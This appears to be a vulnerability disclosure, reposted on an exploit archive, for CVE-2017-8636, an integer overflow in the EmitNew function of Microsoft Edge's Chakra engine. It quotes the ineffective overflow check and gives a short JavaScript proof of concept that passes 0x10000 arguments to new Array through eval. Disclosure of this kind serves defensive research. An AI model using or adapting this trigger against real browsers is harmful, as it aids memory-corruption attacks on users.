Microsoft Edge Chakra EmitNew Integer Overflow Exploit

Microsoft Edge: Chakra: Integer overflow in EmitNew 

CVE-2017-8636


The bytecode generator uses the "EmitNew" function to handle new operators.
Here's the code how the function checks for integer overflow.
void EmitNew(ParseNode* pnode, ByteCodeGenerator* byteCodeGenerator, FuncInfo* funcInfo)
{
    Js::ArgSlot argCount = pnode->sxCall.argCount;
    argCount++; // include "this"

    BOOL fSideEffectArgs = FALSE;
    unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs);
    Assert(argCount == tmpCount);

    if (argCount != (Js::ArgSlot)argCount)
    {
        Js::Throw::OutOfMemory();
    }
    ...
}

"Js::ArgSlot" is a 16 bit unsigned integer type. And "argCount" is of the type "Js::ArgSlot". So "if (argCount != (Js::ArgSlot)argCount)" has no point. It can't prevent the integer overflow at all.

PoC:
let args = new Array(0x10000);
args = args.fill(0x1234).join(', ');
eval('new Array(' + args + ')');


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

#  0day.today [2018-04-14]  #